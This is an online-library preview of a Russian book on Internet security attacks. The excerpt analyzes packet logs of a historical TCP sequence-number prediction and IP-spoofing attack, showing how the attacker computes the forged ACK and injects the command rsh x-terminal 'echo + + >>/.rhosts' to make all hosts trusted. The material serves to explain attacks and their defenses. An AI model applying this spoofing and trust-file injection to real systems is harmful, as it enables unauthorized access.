Илья Медведовский - Атака на Internet
- Название:Атака на Internet
- Автор:
- Жанр:
- Издательство:неизвестно
- Год:неизвестен
- ISBN:нет данных
- Рейтинг:
- Избранное:Добавить в избранное
-
Отзывы:
-
Ваша оценка:
Илья Медведовский - Атака на Internet краткое содержание
Эта книга является одним из первых специализированных изданий, написанных отечественными авторами, которое посвящено обстоятельному анализу безопасности сети Internet. В книге предлагаются и подробно описываются механизмы реализации основных видов удаленных атак как на протоколы TCP/IP и инфраструктуру Сети, так и на многие популярные сетевые операционные системы и приложения.
Особое внимание авторы уделили причинам возникновения и успеха удаленных атак, а также их классификации. Были также рассмотрены основные способы и методы защиты от удаленных атак.
Издание предназначено для сетевых администраторов и пользователей Internet, администраторов безопасности, разработчиков систем защит, системных сетевых программистов, студентов и аспирантов вузов, а также для всех интересующихся вопросами нарушения и обеспечения информационной безопасности компьютерных сетей.
Атака на Internet - читать онлайн бесплатно ознакомительный отрывок
Интервал:
Закладка:
14:18:30.852084apollo.it.luc.edu.991 > x-terminal.shell: R 1382727000:1382727000(0) win 0
14:18:31.115036apollo.it.luc.edu.990 > x-terminal.shell: S 1382727000:1382727000(0) win 4096
14:18:31.284694x-terminal.shell > apollo.it.luc.edu.990: S 2023104000:2023104000(0) ack 1382727001 win 4096
14:18:31.361684apollo.it.luc.edu.990 > x-terminal.shell: R 1382727001:1382727001(0) win 0
14:18:31.627817apollo.it.luc.edu.989 > x-terminal.shell: S 1382727001:1382727001(0) win 4096
14:18:31.795260x-terminal.shell > apollo.it.luc.edu.989: S 2023232000:2023232000(0) ack 1382727002 win 4096
14:18:31.873056apollo.it.luc.edu.989 > x-terminal.shell: R 1382727002:1382727002(0) win 0
14:18:32.164597apollo.it.luc.edu.988 > x-terminal.shell: S 1382727002:1382727002(0) win 4096
14:18:32.335373x-terminal.shell > apollo.it.luc.edu.988: S 2023360000:2023360000(0) ack 1382727003 win 4096
14:18:32.413041apollo.it.luc.edu.988 > x-terminal.shell: R 1382727003:1382727003(0) win 0
14:18:32.674779apollo.it.luc.edu.987 > x-terminal.shell: S 1382727003:1382727003(0) win 4096
14:18:32.845373x-terminal.shell > apollo.it.luc.edu.987: S 2023488000:2023488000(0) ack 1382727004 win 4096
14:18:32.922158apollo.it.luc.edu.987 > x-terminal.shell: R 1382727004:1382727004(0) win 0
14:18:33.184839apollo.it.luc.edu.986 > x-terminal.shell: S 1382727004:1382727004(0) win 4096
14:18:33.355505x-terminal.shell > apollo.it.luc.edu.986: S 2023616000:2023616000(0) ack 1382727005 win 4096
14:18:33.435221apollo.it.luc.edu.986 > x-terminal.shell: R 1382727005:1382727005(0) win 0
14:18:33.695170apollo.it.luc.edu.985 > x-terminal.shell: S 1382727005:1382727005(0) win 4096
14:18:33.985966x-terminal.shell > apollo.it.luc.edu.985: S 2023744000:2023744000(0) ack 1382727006 win 4096
14:18:34.062407apollo.it.luc.edu.985 > x-terminal.shell: R 1382727006:1382727006(0) win 0
14:18:34.204953apollo.it.luc.edu.984 > x-terminal.shell: S 1382727006:1382727006(0) win 4096
14:18:34.375641x-terminal.shell > apollo.it.luc.edu.984: S 2023872000:2023872000(0) ack 1382727007 win 4096
14:18:34.452830apollo.it.luc.edu.984 > x-terminal.shell: R 1382727007:1382727007(0) win 0
14:18:34.714996apollo.it.luc.edu.983 > x-terminal.shell: S 1382727007:1382727007(0) win 4096
14:18:34.885071x-terminal.shell > apollo.it.luc.edu.983: S 2024000000:2024000000(0) ack 1382727008 win 4096
14:18:34.962030apollo.it.luc.edu.983 > x-terminal.shell: R 1382727008:1382727008(0) win 0
14:18:35.225869apollo.it.luc.edu.982 > x-terminal.shell: S 1382727008:1382727008(0) win 4096
14:18:35.395723x-terminal.shell > apollo.it.luc.edu.982: S 2024128000:2024128000(0) ack 1382727009 win 4096
14:18:35.472150apollo.it.luc.edu.982 > x-terminal.shell: R 1382727009:1382727009(0) win 0
14:18:35.735077apollo.it.luc.edu.981 > x-terminal.shell: S 1382727009:1382727009(0) win 4096
14:18:35.905684x-terminal.shell > apollo.it.luc.edu.981: S 2024256000:2024256000(0) ack 1382727010 win 4096
14:18:35.983078apollo.it.luc.edu.981 > x-terminal.shell: R 1382727010:1382727010(0) win 0Видно, что каждый последующий ответный пакет SYN-ACK, посылаемый с хоста x-terminal, имеет начальное значение идентификатора TCP-соединения на 128 000 больше, чем у предыдущего.
Анализ приведенной распечатки пакетов показывает, что каждое последующее начальное значение ISN на хосте x-terminal.shell отличается от предыдущего на 128 000. Например: 2 024 256 000 – 2 024 128 000 = 128 000 или 2 024 128 000 – 2 024 000 000 = 128 000. Не правда ли, простейший закон генерации ISN?
Далее мы видим поддельный запрос на создание TCP-соединения якобы с хоста server.login на x-terminal.shell. При этом x-terminal доверяет хосту server и, следовательно, x-terminal будет выполнять все запросы, переданные с этого хоста (или с любого другого, подменившего хост server).
X-terminal затем отвечает на хост server пакетом SYN-ACK и ожидает подтверждения этого пакета ACK, что должно означать открытие соединения. Так как хост server игнорирует все пакеты, посланные на server.login, то поддельный пакет атакующего, подтвержденный ACK, должен иметь успех.
Обычно значение подтверждения (ACK) берется из пакета SYN-ACK. Однако атакующий, используя предсказание закона изменения начального значения идентификатора TCP-соединения на хосте x-terminal, сможет получить значение ACK без получения пакета SYN-ACK:
14:18:36.245045server.login > x-terminal.shell: S 1382727010:1382727010(0) win 4096 14:18:36.755522server.login > x-terminal.shell: . ack 2024384001 win 4096
Используя полученную математическую зависимость для предсказания значения ISN, атакующий может послать следующий пакет от имени server.login со значением ACK, равным 2 024 384 001, вычисленным по его предыдущему значению 2 024 256 000 добавлением к нему 128 000 + 1.
Хост атакующего сейчас имеет одностороннее соединение с x-terminal.shell, который считает, что это соединение открыто с server.login. Атакующий теперь может передавать пакеты с данными, содержащими верные значения ACK, на x-terminal. Далее он посылает следующие пакеты:
14:18:37.265404server.login > x-terminal.shell: P 0:2(2) ack 1 win 4096
14:18:37.775872server.login > x-terminal.shell: P 2:7(5) ack 1 win 4096
14:18:38.287404server.login > x-terminal.shell: P 7:32(25) ack 1 win 4096что означает выполнение команды server# rsh x-terminal “echo + + >>/.rhosts”.
Завершая атаку, взломщик от имени server.login посылает на x-terminal.shell три пакета, что эквивалентно выполнению на хосте server следующей r-команды: rsh x-terminal “echo + + >>/.rhosts”. Эта команда дописывает в файл/.rhosts строчку + + и делает доверенными все станции.
Всего атака заняла менее 16 секунд.
Атакующий закрывает ложное соединение:
14:18:41.347003server.login > x-terminal.shell: . ack 2 win 4096
14:18:42.255978server.login > x-terminal.shell: . ack 3 win 4096
14:18:43.165874server.login > x-terminal.shell: F 32:32(0) ack 3 win 4096
14:18:52.179922server.login > x-terminal.shell: R 1382727043:1382727043(0) win 4096
14:18:52.236452server.login > x-terminal.shell: R 1382727044:1382727044(0) win 4096Затем атакующий посылает RST-пакеты и, следовательно, закрывает ранее открытые односторонние соединения с server.login, тем самым освобождая очередь запросов.
14:18:52.298431130.92.6.97.600 > server.login: R 1382726960:1382726960(0) win 4096
14:18:52.363877130.92.6.97.601 > server.login: R 1382726961:1382726961(0) win 4096
14:18:52.416916130.92.6.97.602 > server.login: R 1382726962:1382726962(0) win 4096
14:18:52.476873130.92.6.97.603 > server.login: R 1382726963:1382726963(0) win 4096
14:18:52.536573130.92.6.97.604 > server.login: R 1382726964:1382726964(0) win 4096
14:18:52.600899130.92.6.97.605 > server.login: R 1382726965:1382726965(0) win 4096
14:18:52.660231130.92.6.97.606 > server.login: R 1382726966:1382726966(0) win 4096
14:18:52.717495130.92.6.97.607 > server.login: R 1382726967:1382726967(0) win 4096
14:18:52.776502130.92.6.97.608 > server.login: R 1382726968:1382726968(0) win 4096
14:18:52.836536130.92.6.97.609 > server.login: R 1382726969:1382726969(0) win 4096
14:18:52.937317130.92.6.97.610 > server.login: R 1382726970:1382726970(0) win 4096
14:18:52.996777130.92.6.97.611 > server.login: R 1382726971:1382726971(0) win 4096
14:18:53.056758130.92.6.97.612 > server.login: R 1382726972:1382726972(0) win 4096
14:18:53.116850130.92.6.97.613 > server.login: R 1382726973:1382726973(0) win 4096
14:18:53.177515130.92.6.97.614 > server.login: R 1382726974:1382726974(0) win 4096
14:18:53.238496130.92.6.97.615 > server.login: R 1382726975:1382726975(0) win 4096
14:18:53.297163130.92.6.97.616 > server.login: R 1382726976:1382726976(0) win 4096
14:18:53.365988130.92.6.97.617 > server.login: R 1382726977:1382726977(0) win 4096
14:18:53.437287130.92.6.97.618 > server.login: R 1382726978:1382726978(0) win 4096
14:18:53.496789130.92.6.97.619 > server.login: R 1382726979:1382726979(0) win 4096
14:18:53.556753130.92.6.97.620 > server.login: R 1382726980:1382726980(0) win 4096
14:18:53.616954130.92.6.97.621 > server.login: R 1382726981:1382726981(0) win 4096
14:18:53.676828130.92.6.97.622 > server.login: R 1382726982:1382726982(0) win 4096
14:18:53.736734130.92.6.97.623 > server.login: R 1382726983:1382726983(0) win 4096
14:18:53.796732130.92.6.97.624 > server.login: R 1382726984:1382726984(0) win 4096
14:18:53.867543130.92.6.97.625 > server.login: R 1382726985:1382726985(0) win 4096
Читать дальшеИнтервал:
Закладка: